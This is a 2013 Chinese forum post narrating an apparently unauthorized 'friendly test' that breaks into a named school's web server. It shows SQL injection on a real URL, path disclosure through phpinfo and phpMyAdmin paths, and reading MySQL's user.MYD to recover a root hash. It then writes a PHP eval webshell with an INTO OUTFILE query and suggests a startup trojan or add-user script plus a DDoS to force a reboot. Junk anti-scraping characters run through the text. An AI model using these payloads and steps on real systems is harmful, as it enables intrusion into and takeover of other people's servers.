找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2901|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
. M" F4 X( Z  U2 \/ ^  ?: W& H发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!, h7 C% u1 C0 d; D4 z
( n1 O% i9 P8 h7 I

/ P7 Z' b% x! y4 s* T1 C! X, N. v7 g5 a$ X5 i0 l5 W0 {
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 * o% P7 s7 c1 n5 z% z) l6 M! u

  z. A7 X3 A0 e# U! ^那么想可以直接写入shell ,getshell有几个条件:
2 b5 g( W* I8 M# ?* S7 x. k+ j
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
2 ]6 w) n' f: G$ [/ W. g% g" p" `# h& O4 u1 v) H8 C& `" B+ |
试着爆绝对路径:6 @( b% k- Y2 `  v' l2 w: [; a8 a
1./phpMyAdmin/index.php?lang[]=1  % V. ]2 M4 n( E  _
2./phpMyAdmin/phpinfo.php  # R5 t/ z8 r% c# x7 _8 @* O* e
3./load_file()  " h* ]# y  f. s4 k4 f
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  3 |0 `# r: _1 r% A5 ]/ W+ @
5./phpmyadmin/libraries/select_lang.lib.php  
5 N7 y( j& a7 L9 f6./phpmyadmin/libraries/lect_lang.lib.php  ( F3 J0 J- F0 J( T8 R
7./phpmyadmin/libraries/mcrypt.lib.php   
& ]0 F5 i- _: M& t8./phpmyadmin/libraries/export/xls.php  4 O+ K1 q# f" b5 f' \6 q/ u7 I

# F( {0 k% c0 C: _5 j均不行...........................
' X1 B) ~+ N5 L" X# u
. w. {4 m$ ~- ~6 P( @御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
' h0 @& T5 u7 l7 Z# O8 j1 v0 K- q2 I, C  I$ U% A
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin / r& k9 V5 y& Y% @; i: }

4 a, H- U$ h6 n, l默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败$ q( |3 d% H$ |
/ p2 A; U/ `' D2 T: P
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........+ y* U+ K7 d( u# Q

5 j& G0 L; p+ B' k+ a8 m" c想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ! N+ h! i1 {' K; c1 d
1 E0 t/ l9 t0 i% |% Y
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 9 j* r0 Z" J- B6 Z1 A
8 ]/ C& R% m1 w3 s! l& o
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
& ^: U# g% L1 e# r% J; T2 p2 a* t
; `  C7 i8 ~. n9 q3 w3 f. }成功读到root密码:# L! f/ A/ |" A+ c  t
9 s5 U% [+ \' ]
17---- r(0072)) s7 O; X# l5 D9 ?; w2 Z- b
18---- o(006f)
7 n2 `0 V3 |9 h: G7 r0 _19---- o(006f)
& ~, B" H7 A0 h; f0 Q! H20---- t(0074)
- {) e- ?. e/ a8 _6 g. \21---- *(002a)# a/ K; |1 p' N% _  x) g, |: z
22---- 8(0038)# ~1 w) c$ X- G; h
23---- 2(0032)- d% {. _2 ?$ S  y- d
24---- E(0045)3 X5 L% `! w+ x: o- }# M* O6 E
25---- 1(0031)3 B# Y; {' y( {5 E3 A
26---- C(0043)0 b/ Q9 z& G! q) c
27---- 5(0035)
+ Y: I& N  ^4 W: C# u28---- 8(0038)4 i# P4 `; `, ?  a
29---- 2(0032)$ _. S  P$ P/ [3 W' j# T2 o& f
30---- 8(0038)
9 ]( d! r% `" k9 X31---- A(0041)
) n' x; u4 Q# E: v3 W32---- 9(0039)% F$ y/ E6 k4 O8 B
33---- B(0042)8 @3 q0 y  J; F; ^) I# ]% d
34---- 5(0035)
- |* r: [5 @/ @: L: n35---- 4(0034)
; l& B6 K4 S& r& m& o$ o" |36---- 8(0038)# P" p8 @0 f2 Z6 u& a
37---- 6(0036): ?( z  y0 Y. S: t3 p
38---- 4(0034)
& v6 d3 I' [9 ?1 N39---- 9(0039)
2 T; |$ P7 j$ p3 K3 B+ E0 ^2 w40---- 1(0031)4 i7 Y) P# S* C1 ~' y5 f
41---- 1(0031)2 }. \" [( q. w7 R
42---- 5(0035)
( u7 W: n. \! X7 l4 f# U0 r. l' T43---- 3(0033)/ b; m; o# N; ?7 [! }6 N
44---- 5(0035)$ l( m* p8 ]( j8 t
45---- 9(0039)
9 s! b% b% ^: b46---- 8(0038)( z$ x- X+ \) G* r' F: U
47---- F(0046)0 v* B9 q" o; d1 q: T, n
48---- F(0046)
" r  Z1 y1 y! k9 s1 D6 C49---- 4(0034)
% V1 @2 _, A& a) o5 E; F50---- F(0046)5 C, ^( U" U, @4 I1 k# }3 T' I
51---- 0(0030); d5 {) M; U/ z7 d# c
52---- 3(0033)9 [% E+ m1 Q3 z( v5 W6 W+ I" v) r& s
53---- 2(0032)1 G4 l( P% G, B+ ?" {$ O+ t) O
54---- A(0041)
7 Y% |4 z* ]4 R- N# _9 V; V55---- 4(0034)
$ e' K3 `/ }% b: B7 x% w56---- A(0041)& u% R) s' O4 ^8 a, f
57---- B(0042)
$ h3 E4 C# }9 B4 g) t9 ~58---- *(0044)
0 w! N: v! v5 x3 O" S, A59---- *(0035)
! B. ?  \2 p, Q- ~" `' z/ M60---- *(0041)
+ Y3 Y6 t7 m, Y& q% J9 j61---- *0032)
% U9 X" p- T# A
$ t. e1 T; ^; @; _) X解密后成功登陆phpmyamin4 V8 s2 d' A/ Y9 d% Z1 e
                          
: E- u. S4 G! W- ]5 B0 L: K9 L: n1 Q" [+ s- y: Q, \
                             
4 f( [7 C! t) E6 O1 w. E( N' r9 h; p0 @# P  X
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php') k- n5 L7 ?; N' }/ I6 p0 a

2 a) H7 A, P$ V4 M" G2 t成功执行,拿下shell,菜刀连接:& S( L# p$ x1 i4 ]+ I3 G" K
5 A. G$ s$ Q9 k, L. Q
服务器不支持asp,aspx,php提权无果..................." _/ W5 B9 |1 S. k! g

4 v' B) h' N* ^/ {. s1 y; U但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
9 n9 n/ K8 |8 W
服务器上已经有个隐藏帐号了
8 p8 m* ]1 D5 m4 U' I( C8 B+ |6 u
别名     administrators
+ h9 ]' K% @$ n1 Q: g注释     管理员对计算机/域有不受限制的完全访问权

/ b1 D" U6 A8 }! ]: t5 D
成员
* n; m/ ~* v: K& d# }" c+ ?% r6 T
-------------------------------------------------------------------------------9 B0 Y- H+ v7 H8 Z! P
admin
, y) u9 @- R( r4 y9 V) nAdministrator
! @2 A( k  B5 C/ }( ~. \% k6 g3 Nslipper$$ s$ P2 _% u$ x. t% p$ Y5 w
sqluser
: e( Q$ M( u% c命令成功完成。
7 Z2 i" ~2 |% r% Q2 U3 ]4 v
; S+ t; d7 b/ m5 I7 V/ ^服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
/ ^2 j) u9 h+ c
3 s; d( j. L& Jddos服务器重启,不然就只能坐等服务器重启了...............................
. n% a& _! ~' H. e5 p9 F8 U
$ ?7 a- _3 g# @1 `) ~3 G. g5 E1 S/ ?      
  p, w. Y. b. ~5 u3 i' Q

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表